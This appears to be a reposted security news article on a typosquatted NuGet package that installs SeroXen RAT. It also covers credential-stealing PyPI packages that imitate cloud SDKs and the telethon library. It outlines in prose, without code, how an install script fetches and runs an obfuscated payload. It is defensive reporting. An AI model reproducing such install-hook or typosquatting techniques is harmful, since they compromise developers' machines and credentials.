Fake .NET Package on NuGet Delivers SeroXen RAT

by | Oct 13, 2023 | News

Post Views: 139

Premium Content

Subscribe to Patreon to watch this episode.

Reading Time: 3 Minutes

In a recent revelation, a malicious package concealed within the NuGet package manager for the .NET Framework has emerged as a carrier for the remote access trojan known as SeroXen RAT. This perilous package, going by the name “Pathoschild.Stardew.Mod.Build.Config,” is the creation of a user named Disti. It exploits a subtle typo, posing as the legitimate “Pathoschild.Stardew.ModBuildConfig” package, resulting in a typosquat that opens the door to a nefarious software supply chain, as reported by Phylum, a firm specializing in software supply chain security.

While the authentic package has garnered nearly 79,000 downloads to date, the counterfeit variant has manipulated its download count, amassing over 100,000 downloads since its release on October 6, 2023.

The user behind this suspicious package has published six other packages, amassing a staggering 2.1 million downloads collectively. Four of these packages present themselves as libraries for various crypto services, such as Kraken, KuCoin, Solana, and Monero. However, beneath their veneer, they hide the sinister SeroXen RAT.

The malware campaign unfolds during the installation of the package by means of a ‘tools/init.ps1’ script. This script operates to gain code execution without raising any alarms, exploiting a behavior disclosed by JFrog in March 2023. This behavior, known to be exploited for retrieving next-stage malware, allows the attacker to write arbitrary commands.

See Also: So you want to be a hacker?
Offensive Security, Bug Bounty Courses

In the NuGet package analyzed by Phylum, the PowerShell script is used to fetch a file named ‘x.bin’ from a remote server. Interestingly, ‘x.bin’ is a heavily-obfuscated Windows Batch script. This batch script, in turn, is responsible for constructing and executing another PowerShell script that leads to the deployment of the notorious SeroXen RAT.

SeroXen RAT is an off-the-shelf malware available for a meager $60, making it a readily accessible tool for cybercriminals. It operates as a fileless RAT, blending the functionalities of Quasar RAT, the r77 rootkit, and the Windows command-line tool NirCmd.

Phylum emphasized the critical significance of this discovery, stating, “The discovery of SeroXen RAT in NuGet packages only underscores how attackers continue to exploit open-source ecosystems and the developers that use them.”

Trending: Offensive Security Tool: Noir

This development comes on the heels of Phylum’s detection of seven malicious packages on the Python Package Index (PyPI) repository. These packages impersonate legitimate offerings from major cloud service providers like Aliyun, Amazon Web Services (AWS), and Tencent Cloud, clandestinely transmitting credentials to an obfuscated remote URL.

The malicious packages included tencent-cloud-python-sdk, python-alibabacloud-sdk-core, alibabacloud-oss2, python-alibabacloud-tea-openapi, aws-enumerate-iam, enumerate-iam-aws, and alisdkcore. The attacker capitalizes on a developer’s trust, subtly inserting a bit of malicious code designed to extract sensitive cloud credentials.

Furthermore, the attackers targeted Telegram via a deceptive package named telethon2, imitating telethon, a Python library for interacting with Telegram’s API. These counterfeit packages have mainly attracted downloads from the U.S., China, Singapore, Hong Kong, Russia, and France.

These incidents reflect the growing sophistication of attackers in infiltrating software supply chains, highlighting the necessity for robust security measures in open-source ecosystems.

Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?
If you want to express your idea in an article contact us here for a quote: [email protected]

Source: thehackernews.com

Source Link